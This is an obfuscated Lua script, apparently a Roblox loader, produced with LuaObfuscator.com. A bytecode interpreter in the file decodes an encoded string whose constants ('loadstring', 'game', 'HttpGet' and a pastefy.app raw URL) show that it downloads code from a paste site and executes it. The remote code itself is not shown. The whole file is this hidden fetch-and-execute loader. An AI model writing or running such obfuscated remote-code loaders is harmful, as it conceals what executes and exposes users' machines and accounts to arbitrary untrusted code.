--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v90=v2(v0(v30,16));if v19 then local v109=v5(v90,v19);v19=nil;return v109;else return v90;end end end);local function v20(v31,v32,v33) if v33 then local v91=0 -0 ;local v92;while true do if (v91==0) then v92=(v31/((5 -3)^(v32-(1 -0))))%((4 -2)^(((v33-(620 -(555 + 64))) -(v32-1)) + (932 -(857 + 74)))) ;return v92-(v92%(569 -(367 + 201))) ;end end else local v93=(929 -((1091 -(282 + 595)) + (2350 -(1523 + 114))))^(v32-(1 + 0)) ;return (((v31%(v93 + v93))>=v93) and (1 + 0)) or 0 ;end end local function v21() local v34=0 + 0 ;local v35;while true do if (v34==(0 -0)) then v35=v1(v16,v18,v18);v18=v18 + 1 ;v34=1271 -(226 + 1044) ;end if (((4641 -3575) -(68 + (1114 -(32 + 85))))==v34) then return v35;end end end local function v22() local v36=0 + 0 ;local v37;local v38;while true do if (v36==0) then v37,v38=v1(v16,v18,v18 + 1 + 1 );v18=v18 + (959 -(892 + 65)) ;v36=2 -1 ;end if (v36==(1 -0)) then return (v38 * (472 -(566 -(87 + 263)))) + v37 ;end end end local function v23() local v39=0 + 0 ;local v40;local v41;local v42;local v43;while true do if (v39==(180 -((1064 -(915 + 82)) + 113))) then v40,v41,v42,v43=v1(v16,v18,v18 + 3 + 0 );v18=v18 + (9 -5) ;v39=1 + 0 ;end if (v39==(3 -2)) then return (v43 * (16778168 -(802 + 150))) + (v42 * (176444 -(314044 -203136))) + (v41 * (464 -208)) + v40 ;end end end local function v24() local v44=0 + 0 ;local v45;local v46;local v47;local v48;local v49;local v50;while true do if (v44==(2 + (2 -1))) then if (v49==(0 -0)) then if (v48==(0 -(0 -0))) then return v50 * (0 + 0) ;else local v123=0 -0 ;while true do if (v123==(1187 -(1069 + 118))) then v49=2 -(1 + 0) ;v47=0 -0 ;break;end end end elseif (v49==(4477 -2430)) then return ((v48==0) and (v50 * ((1 + 0 + 0)/(0 -0)))) or (v50 * NaN) ;end return v8(v50,v49-(1817 -794) ) * (v47 + (v48/((2 + 0)^((1992 -(87 + 968)) -(261 + 624))))) ;end if (v44==(792 -(368 + 423))) then v47=3 -2 ;v48=(v20(v46,19 -(10 + 8) ,20) * ((7 -5)^(474 -(416 + 26)))) + v45 ;v44=6 -4 ;end if (v44==((26 -20) -4)) then v49=v20(v46,10 + 10 + 1 ,54 -23 );v50=((v20(v46,109 -77 )==(439 -(145 + 293))) and  -(431 -(44 + 386))) or (1487 -(998 + 488)) ;v44=3;end if (v44==((0 -0) + 0)) then v45=v23();v46=v23();v44=1 + 0 ;end end end local function v25(v51) local v52;if  not v51 then v51=v23();if (v51==(1413 -(447 + 966))) then return "";end end v52=v3(v16,v18,(v18 + v51) -(2 -1) );v18=v18 + v51 ;local v53={};for v69=1818 -(1703 + 114) , #v52 do v53[v69]=v2(v1(v3(v52,v69,v69)));end return v6(v53);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v54=(function() return function(v94,v95,v96,v97,v98,v99,v100,v101) local v94=(function() return 0;end)();local v95=(function() return;end)();local v96=(function() return;end)();while true do if (v94~= #":") then else if (v95== #" ") then v96=(function() return v97()~=(0 + 0) ;end)();elseif (v95==(576 -(507 + 67))) then v96=(function() return v98();end)();elseif (v95== #"xnx") then v96=(function() return v99();end)();end v100[v101]=(function() return v96;end)();break;end if (v94==(0 + 0)) then local v115=(function() return 1749 -(1013 + 736) ;end)();local v116=(function() return;end)();while true do if (v115==(0 + 0)) then v116=(function() return 0 -0 ;end)();while true do if (v116~=(3 -2)) then else v94=(function() return  #"[";end)();break;end if (v116~=(867 -(550 + 317))) then else v95=(function() return v97();end)();v96=(function() return nil;end)();v116=(function() return 1 + 0 ;end)();end end break;end end end end return v94,v95,v96,v97,v98,v99,v100,v101;end;end)();local v55=(function() return function(v102,v103,v104) local v105=(function() return 0;end)();local v106=(function() return;end)();while true do if ((0 -0)==v105) then v106=(function() return 0 -0 ;end)();while true do if ((0 -0)~=v106) then else local v124=(function() return 1000 -(451 + 549) ;end)();while true do if (v124==(0 + 0)) then v102[v103-#"[" ]=(function() return v104();end)();return v102,v103,v104;end end end end break;end end end;end)();local v56=(function() return {};end)();local v57=(function() return {};end)();local v58=(function() return {};end)();local v59=(function() return {v56,v57,nil,v58};end)();local v60=(function() return v23();end)();local v61=(function() return {};end)();for v71= #">",v60 do FlatIdent_6A83E,Type,Cons,v21,v24,v25,v61,v71=(function() return v54(FlatIdent_6A83E,Type,Cons,v21,v24,v25,v61,v71);end)();end v59[ #"91("]=(function() return v21();end)();for v72= #"\\",v23() do local v73=(function() return 0 -0 ;end)();local v74=(function() return;end)();while true do if (v73~=0) then else v74=(function() return v21();end)();if (v20(v74, #" ", #"[")==0) then local v119=(function() return 285 -(134 + 151) ;end)();local v120=(function() return;end)();local v121=(function() return;end)();local v122=(function() return;end)();while true do if ((1 + 1)==v119) then if (v20(v121, #"]", #"|")== #".") then v122[1667 -(970 + 695) ]=(function() return v61[v122[2 -0 ]];end)();end if (v20(v121,3 -1 ,2)~= #"[") then else v122[ #"xnx"]=(function() return v61[v122[ #"gha"]];end)();end v119=(function() return 1993 -(582 + 1408) ;end)();end if (v119==(1582 -(1535 + 46))) then local v125=(function() return 0 + 0 ;end)();while true do if (v125==0) then v122=(function() return {v22(),v22(),nil,nil};end)();if (v120==0) then local v157=(function() return 0 + 0 ;end)();local v158=(function() return;end)();while true do if (v157==(0 -0)) then v158=(function() return 0 + 0 ;end)();while true do if (v158==(0 -0)) then v122[ #"nil"]=(function() return v22();end)();v122[ #"xnxx"]=(function() return v22();end)();break;end end break;end end elseif (v120== #":") then v122[ #"gha"]=(function() return v23();end)();elseif (v120==2) then v122[ #"gha"]=(function() return v23() -((2 -0)^(11 + 5)) ;end)();elseif (v120== #"nil") then local v187=(function() return 0 -0 ;end)();while true do if (v187~=(603 -(268 + 335))) then else v122[ #"91("]=(function() return v23() -((7 -5)^(1840 -(1195 + 629))) ;end)();v122[ #".com"]=(function() return v22();end)();break;end end end v125=(function() return 1 -0 ;end)();end if (v125~=(291 -(60 + 230))) then else v119=(function() return 243 -(187 + 54) ;end)();break;end end end if (v119==(783 -(162 + 618))) then if (v20(v121, #"gha", #"xnx")== #"|") then v122[ #"?id="]=(function() return v61[v122[ #".com"]];end)();end v56[v72]=(function() return v122;end)();break;end if (v119~=(0 + 0)) then else v120=(function() return v20(v74,1458 -(282 + 1174) , #"-19");end)();v121=(function() return v20(v74, #".com",6);end)();v119=(function() return 812 -(569 + 242) ;end)();end end end break;end end end for v75= #".",v23() do v57,v75,v28=(function() return v55(v57,v75,v28);end)();end return v59;end local function v29(v63,v64,v65) local v66=v63[2 -1 ];local v67=v63[1 + 1 ];local v68=v63[1027 -(706 + (595 -277)) ];return function(...) local v76=v66;local v77=v67;local v78=v68;local v79=v27;local v80=1252 -(721 + 530) ;local v81= -(1272 -(945 + 326));local v82={};local v83={...};local v84=v12("#",...) -(1 + 0) ;local v85={};local v86={};for v107=700 -(271 + 429) ,v84 do if (v107>=v78) then v82[v107-v78 ]=v83[v107 + 1 + 0 ];else v86[v107]=v83[v107 + (1 -0) ];end end local v87=(v84-v78) + 1 + 0 ;local v88;local v89;while true do local v108=1500 -(1408 + 92) ;while true do if (v108==0) then v88=v76[v80];v89=v88[1];v108=1087 -(461 + 625) ;end if (v108==(1 + 0)) then if (v89<=(1296 -(993 + 295))) then if (v89<=((5 -3) + 1)) then if (v89<=(1 + 0)) then if ((v89==(0 -0)) or (569>=1591)) then local v131=v88[1173 -(418 + 753) ];local v132,v133=v79(v86[v131](v13(v86,v131 + 1 + 0 ,v88[1 + 2 ])));v81=(v133 + v131) -(1 + 0) ;local v134=(1227 -(322 + 905)) + 0 ;for v159=v131,v81 do local v160=0;while true do if ((v160==(1329 -(797 + 532))) or (4490<=89)) then v134=v134 + (612 -(602 + 9)) + 0 ;v86[v159]=v132[v134];break;end end end else v86[v88[531 -(406 + 123) ]]=v88[1772 -(1749 + 20) ];end elseif (v89==(1 + 1)) then v86[v88[1324 -(1249 + 73) ]]=v65[v88[2 + 1 ]];else v86[v88[(2336 -(449 + 740)) -(466 + 679) ]]();end elseif (v89<=(11 -(878 -(826 + 46)))) then if ((v89>(11 -7)) or (4983<1808)) then local v139=1900 -((1053 -(245 + 702)) + 1794) ;local v140;while true do if ((0 + 0)==v139) then v140=v88[(758 -518) -(64 + 174) ];v86[v140]=v86[v140](v13(v86,v140 + 1 + 0 ,v81));break;end end else do return;end end elseif ((3829>3769) and (v89<=(2 + 2 + 2))) then v86[v88[5 -3 ]]=v88[7 -4 ];elseif (v89==(121 -(4 + 110))) then local v161=584 -(57 + 527) ;local v162;local v163;while true do if (v161==(1428 -(41 + 1386))) then v86[v162 + (104 -(17 + (1984 -(260 + 1638)))) ]=v163;v86[v162]=v163[v88[2 + 2 ]];break;end if ((0 + 0)==v161) then v162=v88[1582 -(1183 + 397) ];v163=v86[v88[(446 -(382 + 58)) -3 ]];v161=2 -1 ;end end else v86[v88[168 -(122 + 44) ]]={};end elseif (v89<=(20 -8)) then if (v89<=((6368 -4383) -(1913 + 62))) then if (v89==((25 + 4) -20)) then local v143=v88[2];v86[v143]=v86[v143](v13(v86,v143 + 1 + 0 ,v81));else v86[v88[1 + 1 ]]();end elseif ((1485<=2904) and (v89==((43 -22) -10))) then v86[v88[67 -(30 + 35) ]]=v88[3 + (0 -0) ]~=((2462 -(902 + 303)) -(1043 + (469 -255))) ;else local v146=0 -0 ;local v147;local v148;local v149;local v150;while true do if (v146==((0 -0) -0)) then v147=v88[1214 -(323 + 889) ];v148,v149=v79(v86[v147](v13(v86,v147 + ((1 + 0) -0) ,v88[7 -4 ])));v146=581 -(361 + 219) ;end if (v146==(306 -((1934 -(1121 + 569)) + 60))) then for v177=v147,v81 do local v178=(534 -(22 + 192)) -(53 + 267) ;while true do if ((0 + (683 -(483 + 200)))==v178) then v150=v150 + (414 -(15 + (1861 -(1404 + 59)))) ;v86[v177]=v148[v150];break;end end end break;end if ((4269==4269) and (v146==(983 -(18 + 964)))) then v81=(v149 + v147) -(3 -2) ;v150=0 + (0 -0) ;v146=1127 -(936 + 189) ;end end end elseif ((387<=2782) and (v89<=(5 + (11 -2)))) then if ((v89==((2391 -(468 + 297)) -((2127 -(334 + 228)) + 48))) or (1899<=917)) then local v151=0 + 0 ;local v152;local v153;while true do if ((v151==(850 -(20 + 830))) or (4312<=876)) then v152=v88[1140 -(782 + 356) ];v153=v86[v88[3 + 0 ]];v151=2 -1 ;end if (v151==(1 -0)) then v86[v152 + ((3686 -2593) -(975 + 117)) ]=v153;v86[v152]=v153[v88[130 -(116 + 10) ]];break;end end else v86[v88[2 + 0 ]]=v65[v88[1 + 2 ]];end elseif (v89<=(753 -(542 + (454 -258)))) then v86[v88[3 -1 ]]={};elseif (v89==(5 + 11)) then do return;end else v86[v88[2 + (0 -0) ]]=v88[2 + 1 ]~=(0 -0) ;end v80=v80 + (2 -1) ;break;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403203Q00682Q7470733A2Q2F706173746566792E612Q702F3542356C6A3964452F726177000A4Q000F7Q001202000100013Q001202000200023Q002007000200020003001201000400044Q000B000500014Q000C000200054Q000900013Q00022Q000A0001000100012Q00103Q00017Q00",v9(),...);
